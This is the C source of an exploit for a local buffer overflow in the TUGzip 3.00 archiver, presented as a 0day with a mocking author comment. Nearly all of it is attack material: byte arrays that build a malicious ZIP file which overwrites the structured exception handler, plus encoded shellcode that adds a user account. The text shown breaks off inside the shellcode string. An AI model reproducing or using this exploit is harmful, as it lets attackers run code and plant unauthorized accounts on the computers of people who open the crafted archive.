/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow "If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK) Well hello there ,greetz from Romania,here is a exploit for the archiver TUGzip. So the payload doesen't always execute,it's just a matter of patience,from 10 attemps you get success on 2 in the best case.Got 3 more archivers with stack overflow and heap overflow,I'm bored... I'm looking for a new approach,will see soon what I'm going to bring you. "Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa" Credits go to Stefan Marin or fl0 fl0w :) . All the best ! Registers EAX 00000000 ECX 00000064 EDX 0013F6D0 EBX 0117ABDC ESP 0013F6D0 EBP 45444342 ESI 0117AF6C EDI 00D88B1C EIP 58585858 SEH chain of main thread, item 0 Address=0013F6D0 SE handler=C9C9C9C9 */ #include #include #include #include #define OFFSET 2504 #define NOP 2515 #define shellcode_offset 2535 char file_1[]= "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x66\x66\x64\x73\x75\x69\x62\x7A\x65\x6F\x69\x76\x7A\x20\x66\x68" "\x65\x6F\x20\x79\x66\x6F\x7A\x69\x61\x71\x20\x6F\x69\x65\x61\x7A" "\x75\x20\x7A\x71\x6F\x66\x68\x75\x65\x7A\x71\x6F\x69\x65\x6E\x66" "\x65\x7A\x6A\x75\x71\x63\x62\x75\x71\x70\x7A\x61\x7A\x69\x27\x74" "\x75\x72\x65\x6F\x7A\x6E\x62\x69\x6A\x75\x76\x62\x67\x73\x64\x75" "\x69\x71\x79\x72\x7A\x61\x6A\x20\x62\x63\x73\x64\x6F\x70\x69\x75" "\x72\x79\x7A\x6F\x65\x61\x71\x6E\x62\x69\x6F\x64\x73\x79\x72\x66" "\x65\x7A\x71\x6F\x69\x70\x62\x75\x66\x63\x73\x71\x69\x75\x79\x72" "\x61\x7A\x62\x69\x6A\x65\x66\x62\x68\x73\x75\x69\x71\x76\x64\x73" "\x71\x69\x6A\x62\x66\x65\x7A\x71\x75\x61\x66\x64\x64\x64\x64\x64" "\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x68\x68" "\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x75\x75\x75" "\x75\x75\x75\x75\x75\x75\x75\x75\x68\x76\x71\x24\x69\x66\x72\x7A" "\x65\x6F\x62\x76\x69\x6F\x7A\x65\x71\x66\x74\x72\x65\x6F\x7A\x71" "\x6A\x6E\x62\x76\x64\x73\x70\x69\x79\x75\x66\x71\x6F\x65\x69\x68" "\x66\x72\x6F\x75\x65\x7A\x68\x61\x72\x62\x20\x69\x76\x66\x64\x73" "\x70\x6F\x68\x6A\x72\x65\x71\x6F\x75\x68\x66\x7A\x65\x61\x71\x75" "\x68\x76\x71\x6F\x75\x68\x65\x66\x6F\x71\x73\x69\x6A\x68\x64\x6F" "\x73\x71\x68\x76\x64\x6F\x69\x68\x7A\x61\x71\x6F\x65\x69\x68\x66" "\x64\x73\x6F\x69\x75\x68\x76\x63\x78\x77\x69\x75\x68\x66\x71\x6F" "\x75\x69\x68\x76\x77\x78\x6F\x69\x68\x66\x64\x73\x71\x6F\x69\x68" "\x76\x64\x73\x71\x6F\x69\x75\x68\x7A\x67\x66\x6F\x69\x68\x73\x64" "\x71\x6F\x69\x75\x68\x67\x7A\x65\x71\x6F\x69\x68\x67\x73\x71\x6F" "\x69\x68\x67\x7A\x61\x65\x7A\x72\x75\x79\x61\x75\x79\x74\x61\x65" "\x70\x69\x75\x79\x55\x59\x54\x4F\x5A\x52\x45\x50\x49\x48\x47\x41" "\x5A\x55\x59\x56\x44\x53\x4F\x49\x59\x54\x41\x50\x4F\x49\x55\x45" "\x59\x52\x49\x55\x45\x5A\x59\x47\x42\x4B\x4A\x43\x58\x4E\x4B\x56" "\x4E\x4B\x43\x58\x42\x57\x56\x4B\x4A\x4E\x42\x43\x58\x48\x42\x4B" "\x4A\x44\x48\x46\x4F\x49\x48\x5A\x45\x52\x4F\x49\x55\x48\x45\x5A" "\x55\x49\x4F\x41\x42\x45\x5A\x55\x49\x42\x47\x55\x49\x56\x43\x50" "\x4C\x44\x53\x47\x57\x4B\x52\x54\x42\x4E\x49\x55\x43\x49\x55\x4F" "\x51\x45\x42\x48\x52\x55\x49\x59\x44\x46\x51\x50\x5A\x49\x55\x45" "\x52\x50\x49\x55\x44\x59\x46\x54\x50\x41\x49\x5A\x55\x45\x59\x52" "\x5A\x45\x55\x48\x52\x54\x49\x55\x50\x56\x58\x57\x4B\x4A\x43\x4E" "\x48\x42\x47\x50\x46\x4F\x49\x55\x50\x41\x49\x52\x59\x45\x5A\x4F" "\x41\x49\x54\x59\x38\x37\x33\x32\x39\x35\x36\x35\x39\x34\x38\x33" "\x32\x36\x35\x46\x53\x34\x38\x59\x46\x44\x53\x39\x38\x59\x55\x56" "\x47\x30\x39\x38\x51\x59\x55\x52\x30\x39\x38\x34\x59\x35\x32\x33" "\x39\x38\x41\x59\x39\x46\x38\x45\x51\x59\x5A\x35\x39\x38\x59\x36" "\x39\x38\x46\x47\x59\x39\x38\x51\x59\x39\x47\x46\x44\x53\x55\x59" "\x30\x39\x48\x34\x5A\x48\x33\x37\x38\x35\x32\x33\x31\x42\x34\x47" "\x38\x30\x47\x46\x44\x53\x55\x49\x42\x56\x51\x49\x55\x4F\x59\x50" "\x52\x39\x5A\x48\x46\x44\x53\x51\x55\x49\x47\x46\x47\x44\x55\x53" "\x53\x53\x53\x53\x45\x47\x46\x39\x32\x47\x35\x33\x34\x55\x47\x46" "\x39\x49\x53\x50\x47\x42\x55\x54\x50\x5A\x39\x38\x59\x35\x33\x41" "\x41\x42\x43\x43\x46\x52\x45\x43\x43\x45\x54\x52\x45\x5A\x47\x52" "\x46\x44\x53\x49\x4F\x5A\x48\x45\x52\x42\x4E\x4F\x56\x46\x44\x53" "\x4F\x49\x52\x48\x54\x4F\x5A\x49\x4E\x46\x47\x44\x4B\x4E\x46\x43" "\x58\x4C\x4B\x59\x89\x05\x8A\x9B\x98\x98\x98\x4F\x49\x49\x49\x49" "\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42" "\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48" "\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44" "\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F\x4D\x4E\x4F\x4C\x36\x4B" "\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x42\x36\x4B" "\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45\x44\x4E\x43\x4B\x38\x4E" "\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B\x48\x4F\x34\x4A\x51\x4B" "\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49\x44\x4B\x38\x46\x43\x4B" "\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49\x59\x4E\x4A\x46\x58\x42" "\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D\x30\x41\x30\x44\x4C\x4B" "\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A\x52\x45\x57\x45\x4E\x4B" "\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48\x36\x4B\x58\x4E\x50\x4B" "\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B\x4E\x43\x30\x4E\x52\x4B" "\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41\x36\x43\x4C\x41\x43\x4B" "\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B\x48\x42\x44\x4E\x50\x4B" "\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42\x44\x4A\x30\x50\x45\x4A" "\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42\x35\x4F\x4F\x48\x4D\x48" "\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44\x33\x4A\x56\x47\x37\x43" "\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42\x4D\x4A\x36\x4B\x4C\x4D" "\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48\x4D\x4F\x45\x49\x58\x45" "\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44\x30\x45\x35\x4C\x36\x44" "\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49\x50\x45\x4F\x4D\x4A\x47" "\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43" "\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42\x4D\x48\x46\x4A\x56\x41" "\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41\x4E\x45\x59\x4A\x46\x46" "\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F\x4F\x48\x4D\x4C\x36\x42" "\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x46\x4A\x4D\x4A\x50" "\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43\x55\x45\x45\x4F\x4F\x42" "\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49\x44\x47\x45\x4F\x4F\x48" "\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F\x4F\x42\x4D\x43\x39\x4A" "\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47\x45\x4F\x4F\x48\x4D\x45" "\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46\x36\x48\x36\x4A\x56\x43" "\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42\x45\x49\x35\x49\x32\x4E" "\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49\x58\x44\x4E\x41\x43\x42" "\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D\x32\x50\x4F\x44\x34\x4E" "\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B\x4A\x4B\x4A\x4B\x4A\x4A" "\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F\x4F\x45\x37\x46\x44\x4F" "\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4C" "\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4F\x4F\x42\x4D\x4A" "\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43\x55\x4F\x4F\x48\x4D\x4C" "\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42\x4D\x4B\x48\x47\x45\x4E" "\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48\x4D\x44\x45\x4F\x4F\x42" "\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F\x45\x43\x55\x4F\x4F\x48" "\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xFD\x81\x98\x98\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x2E\x74" "\x78\x74\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC" "\xCE\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08" "\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45" "\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x43\x43\x43\x43\x43\x43\x43\x43\x43" "\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x41\x42\x43\x44\x45\x58\x58\x58\x58\x41\x41\x41\x41"; char file_2[]= "\x41\x41\x41\x41\xCC\xCC\xCC\xCC\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4A\x4A\x4A\x4A\x4A\x4A" "\x4A\x4A\x4A\x4A\x4A\x4A\x4A\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B" "\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C" "\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x4D\x4D\x4D\x4D\x4D\x4D\x4D\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E" "\x4E\x4E\x4E\x4E\x4E\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4F\x4F\x4F\x4F" "\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x50\x50\x50\x50\x50\x50" "\x50\x50\x50\x50\x50\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x51\x51\x51\x51\x51\x51\x51" "\x51\x51\x32\x32\x32\x32\x32\x89\x03\x59\x89\x05\x8A\x9B\x98\x98" "\x98\x4F\x49\x49\x49\x49\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30" "\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56" "\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42" "\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F" "\x4D\x4E\x4F\x4C\x36\x4B\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F" "\x4F\x4F\x4F\x42\x36\x4B\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45" "\x44\x4E\x43\x4B\x38\x4E\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B" "\x48\x4F\x34\x4A\x51\x4B\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49" "\x44\x4B\x38\x46\x43\x4B\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49" "\x59\x4E\x4A\x46\x58\x42\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D" "\x30\x41\x30\x44\x4C\x4B\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A" "\x52\x45\x57\x45\x4E\x4B\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48" "\x36\x4B\x58\x4E\x50\x4B\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B" "\x4E\x43\x30\x4E\x52\x4B\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41" "\x36\x43\x4C\x41\x43\x4B\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B" "\x48\x42\x44\x4E\x50\x4B\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42" "\x44\x4A\x30\x50\x45\x4A\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42" "\x35\x4F\x4F\x48\x4D\x48\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44" "\x33\x4A\x56\x47\x37\x43\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42" "\x4D\x4A\x36\x4B\x4C\x4D\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48" "\x4D\x4F\x45\x49\x58\x45\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44" "\x30\x45\x35\x4C\x36\x44\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49" "\x50\x45\x4F\x4D\x4A\x47\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43" "\x35\x43\x35\x43\x35\x43\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42" "\x4D\x48\x46\x4A\x56\x41\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41" "\x4E\x45\x59\x4A\x46\x46\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F" "\x4F\x48\x4D\x4C\x36\x42\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A" "\x56\x46\x4A\x4D\x4A\x50\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43" "\x55\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49" "\x44\x47\x45\x4F\x4F\x48\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F" "\x4F\x42\x4D\x43\x39\x4A\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47" "\x45\x4F\x4F\x48\x4D\x45\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46" "\x36\x48\x36\x4A\x56\x43\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42" "\x45\x49\x35\x49\x32\x4E\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49" "\x58\x44\x4E\x41\x43\x42\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D" "\x32\x50\x4F\x44\x34\x4E\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B" "\x4A\x4B\x4A\x4B\x4A\x4A\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F" "\x4F\x45\x37\x46\x44\x4F\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41" "\x35\x41\x45\x41\x35\x4C\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41" "\x45\x4F\x4F\x42\x4D\x4A\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43" "\x55\x4F\x4F\x48\x4D\x4C\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42" "\x4D\x4B\x48\x47\x45\x4E\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48" "\x4D\x44\x45\x4F\x4F\x42\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F" "\x45\x43\x55\x4F\x4F\x48\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61" "\x82\xFD\x81\x98\x98\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x2E\x74\x78\x74\x50\x4B\x05\x06\x00\x00\x00\x00" "\x01\x00\x01\x00\x42\x08\x00\x00\x32\x08\x00\x00"; char shellcode_1[]= // Skylined's alpha2 unicode decoder //Un-encoded ADD USER shellcode "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA" "BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB" // Encoded opcodes "ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM" "kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp" "tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0" "C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s" "mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s" 